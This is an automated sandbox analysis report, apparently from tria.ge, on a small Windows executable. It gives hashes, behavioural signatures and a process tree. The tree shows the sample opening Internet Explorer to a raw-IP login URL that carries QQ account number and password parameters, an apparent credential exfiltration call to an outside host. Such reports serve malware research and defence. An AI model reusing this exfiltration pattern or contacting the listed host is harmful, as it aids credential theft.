Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
136s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
12/09/2024, 17:46
Static task
static1
Behavioral task
behavioral1
Sample
dcbd5cd714ab4e5a4a0a3c301238dfbb_JaffaCakes118.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
dcbd5cd714ab4e5a4a0a3c301238dfbb_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
dcbd5cd714ab4e5a4a0a3c301238dfbb_JaffaCakes118.exe
-
Size
14KB
-
MD5
dcbd5cd714ab4e5a4a0a3c301238dfbb
-
SHA1
22e7619019a9dc3210743fc5f78b7f3f96bd6686
-
SHA256
aeac438f399b83b1c3c345dcc1f22e6df0d393281f8c72f63a4830b89d9e560a
-
SHA512
a4261310e9e30a1f38ff59c73ad6aca0c41cccc76b90fc2a8a62e73c66ddfa621ec0a2cbb5ae1c2802832e978ccd2d8326b1112b5f4082617b6d35eccf5131f8
-
SSDEEP
384:XeQh2vDZIPYD+iaj/aR3oj2JX69lniCP8yY40:X72diiaj2xhE8yY
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dcbd5cd714ab4e5a4a0a3c301238dfbb_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d854e951ecdca4792ad3aea80f03551000000000200000000001066000000010000200000001b5aa966f7580d7da65218b3399424a581b6b53c94845d1d4a7bf79d7ca03ab6000000000e8000000002000020000000692167ea07aaf86165d5781d96a322e8e7e05d65cc64150285e7bb55dbab691a900000000bf0d75d8d91ef3c7099841ad71b256ddfdf650d0900f74b3daa17266d234826b8d35d7b5c27553e21254e9cdfa0850263f9aa3ee36f5800a4aaa877b3dc652ffa7cf9ed0c7f68a2b1d365c8c317b2a8470f25383472d4f6b365caabbc01d4c8179fa27ea750af85266502c68f767a1e07459df3e4a681b71a7674aed3922c66cfffaa2906a2aa27342538c373b5042e400000004fbc4656f2f9c270c51032763526084b98ec58f4be608d8dbf7bbcb0c4d0ed8a2de91aa7f97b31e4a1cbcd84d4dc063dac399be10405e532c973785895938629 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "432325082" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{FE803C91-712E-11EF-91F6-D6EBA8958965} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 605b21ec3b05db01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000000d854e951ecdca4792ad3aea80f0355100000000020000000000106600000001000020000000568c88e82bd294a1ed13fa4a13f18b6e84425a54f892f4864c281149caff348f000000000e8000000002000020000000b25a64d0e2964afb347bbea36e306dbc212cbe7c08099ee0cecf1a92762b8ff420000000f3e1b6ac4bb6c5783d6fac9ad15e4e93ae64ef94541684e58e2b52011b8da79c40000000149fa70ddace45d32762ae39164c2008203bd27acced7d00d9226458f9b3a765b719428166f8dee39f8536bf87932b855af59c876faf584147635ab2467085a0 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2808 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 2808 iexplore.exe 2808 iexplore.exe 2568 IEXPLORE.EXE 2568 IEXPLORE.EXE 2568 IEXPLORE.EXE 2568 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2192 wrote to memory of 2808 2192 dcbd5cd714ab4e5a4a0a3c301238dfbb_JaffaCakes118.exe 30 PID 2192 wrote to memory of 2808 2192 dcbd5cd714ab4e5a4a0a3c301238dfbb_JaffaCakes118.exe 30 PID 2192 wrote to memory of 2808 2192 dcbd5cd714ab4e5a4a0a3c301238dfbb_JaffaCakes118.exe 30 PID 2192 wrote to memory of 2808 2192 dcbd5cd714ab4e5a4a0a3c301238dfbb_JaffaCakes118.exe 30 PID 2808 wrote to memory of 2568 2808 iexplore.exe 31 PID 2808 wrote to memory of 2568 2808 iexplore.exe 31 PID 2808 wrote to memory of 2568 2808 iexplore.exe 31 PID 2808 wrote to memory of 2568 2808 iexplore.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\dcbd5cd714ab4e5a4a0a3c301238dfbb_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\dcbd5cd714ab4e5a4a0a3c301238dfbb_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://125.64.16.175/login1.asp?QQNumber=10001&QQPassWord=100012⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2808 CREDAT:275457 /prefetch:23⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2568
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD53f69df52020f4f3f231284a1e3292a68
SHA113964cd6d07e592cec29726270c622f491537370
SHA256439cdcfdeb25be34f40cb6e39c96c1e17abe0c22406f92f09495661e7d1afbcf
SHA512124cdc885a72080095e61ea0cc660cbdfd9e0a966b6c8d9af54bf23b144f10c24afa61a5f4ba3da9e200fb08d845e0f3c944fdf543ca6c7944658882880e0d2e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD54c777b167c886f7969e9e38f863bd322
SHA1bc3f9754a171a2dd084b477840d99bb6704b2ad0
SHA25631f13a0f8d979240210e31040ae3ddfbf8160d4a10aad41538407c861bfde9fd
SHA5128ff0bd42aa0cfedefba81cdace5e8d13483b80fbf32cdb3552d38ddcb84d026b78a0d78aa67398b1103cdc184a4ad67efab85ec23aeb480bc54b66f2e2c3a78b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD558eba3ebe961ed02663d737400c80f80
SHA1b217407bd3b0737461f07dda93e2c85bd70cef0f
SHA2562c7beb731eabf198388b82eb93775778bedf5b5976a246017737557d8961ea1f
SHA512fdedb1a54a30f0d01cd08951ec0919f3c1ca59e69803c8bfa34027627ca5be3ac4e289004ed393384848a267832614c903afe1c9d16d8cc7f0bd1d47476031be
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c2e3fa6b570143b25c5c64b677f6e2aa
SHA1860b1251ae423b3652c4113ae2b7655d3cb6ef1e
SHA2569b9d6b87c9e976bd51d35634b2845269b7443eb29f2b1065a4864920a9649e35
SHA51279a2b7f914d231346afad253c28998099b46a6263822b05f5fad7749bdd379ac5cf47c88d74644252c856411f5f7ccee78f6d5c9c63d7f59d1aa103cf3b8d386
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD525604442c360652a590091633e9e7ca1
SHA173e03c91322af2c414a1114c1eee3cce79fd2616
SHA2561ac18193379b60066c0659776bbf4d59dc8dd12a3aef24b221e95b1144fc6447
SHA512a999688d197bdeb9083a82fed7aea607ad86c61fe4be8a0cc5ef2a400a655042518c6ee25bf4987b4988020f3ebb2494060a9ec02fe4b028b124617eda4d4967
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c33eaebf232ac6f50fcffb3c6509c12e
SHA15e63345fd36328e0d3146215257422f36ee6ee63
SHA2566e2ed3f86c2d486cd6f79f5ec1c051cad7f117a6a2a558db2504bc7f2efa799a
SHA51232b3bb5fcf04fc37922532a3700bc3dca1b1128cee30e5ab6867e69d67aa0f3f2d86d3d56a55bb11961750a22ee846ef13d427a44ab09caea5d62d2bf927e167
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD584aa869523db34e36af1185b6d6fb805
SHA130941e4384f8929df68f36f55c6b7855b79e0656
SHA256cf84990b17c956882da224a70182e5fceabca80feddf68a9c60b5202d1b8ed47
SHA512553c3e9fab61a4e5eba24bc758ca531a64c7a957e2a3851319e7cce1772eec49cb5f9131852b24af09bcbe0c1572b71724d8841be7f6f45e34208ac25c51745b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD57f1285f4ea08450344358cffa0db7b14
SHA169e534bf021602cc3885ac8d1d504999b3cdf318
SHA25655b832d26aaeb6a751568898ba47d15b9f2f22dc028fedd095ea4e4338fd374b
SHA5122d3e52d57f183e2c762ee11b90a4a83cc23b551045a58e1a232017e06ff643b043a7388f23c5426423c2f74c9dfdbcf63a7916d94280afd7f9a4c308e24c315a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD514c8fb0ea1c1745230cfd364d2e57533
SHA14cbe12384cc8eed4f1b94c83b23db496ed4e4279
SHA2564af7094781dc79704b6b032f3d01f14099e52c92694356b5f7f000e0dbfb7213
SHA5122bb0e8cdff2266a445cbf960fac1d564499635600d60377e78a7951db83b60ac44e851f1733aac89a575870320e018f18809c7febaaeb1ed08bf8a5339ccf386
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5db6441db08193cd9144de4c61e807142
SHA1550d533d437e35af9ce60c323e5cb30ea8b927b1
SHA2568dbbb98655511e54c42fa3c9a55475b3338c8eb53a3c5507c53363929f23efd1
SHA51236eb9035263e6686652dfc3c030ba90dd9817178cf2da38b22fa524cea86c417c9c3091e119e5c097be9f21d6e8cb940ac23f1cbad0625ae71bdfb952cbd0f94
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5957f6f7228c3667e563bbf055e968809
SHA10c7a5099801a73c37a9043ee7d7f212f8679bab3
SHA25646cc68ccfde60242a571c2fbbbd4952c04a932a71e734fbcd4b7d79461fca57a
SHA5128fb0af95b766c3e81562ce4d5dfd58fe75368795361755647bef6936cb8c0f9fc382bc77300519dccfe8e3d53a684ae80de86f4ddbba590cf7e1115e5da77e3b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5d2a432f016fd6a3e297be1e74b72c402
SHA17073a898bcbf1c5bee012064019f4739f7db94d4
SHA2563bf4a23a72d880145e9f60caa37c6d3a2c21d27c65dcffce66a0189574bf0f12
SHA512a44dbd874eeba96d9221de3fd1933c7a84a1b4e80f9669b05f967c99bde9a2158f36233f2e1ed3efa24c499dc4e4f44e9987f2326c119535ca9832e9cbe6f7c1
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5f307d6e99f0fbf418a462f5139f4c635
SHA1fb3edfdf94f42ad1379e8a4f14d829d5b3cef538
SHA25683d69198e5d0a51337f8481cced0db8ede0a46d20134a8f73ba98ab3b9d98b0f
SHA512ad4b0e3d9a967a0861329b332b0321277738beb3474bab5757515d15931d60e26d2bca1ab30a2ff3d2ee011467c51ef1c8190c5823f518baa172ef17855f3645
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5dc910bb44af9da945c00ead8b648694f
SHA121b95ec7fa2b24e7924fbead1cb06054ee3914bf
SHA256fd572cc4c46c79caeaa12118e829840379ff4f58ce5a365b661b8bfed543ada5
SHA512e3b48aec0f7a27ba0905abd461283ae3967bc1fcce7d89d9a57e90d660762c45fc65826a0be2e3f128816ff2ab79dbe7c72c1af2c557f2bdb7b3d8908e1da7dd
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5f951c2c11530f038a8766c7df25eadee
SHA1aaa44ce0261576d1d7882a48dae6a302cf37e3e3
SHA256e024f117d2d0417b8d7d10bdb25fdea77928152b3e34b1837f40198e313ea575
SHA5129d4a47a1b150cf09219b73cf4e07639e0d777faad8b789005f9912ad8f907480a378bb72baff125bcb06a3f66f1408f715bc502066c23d95a805aaa46dbb61eb
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b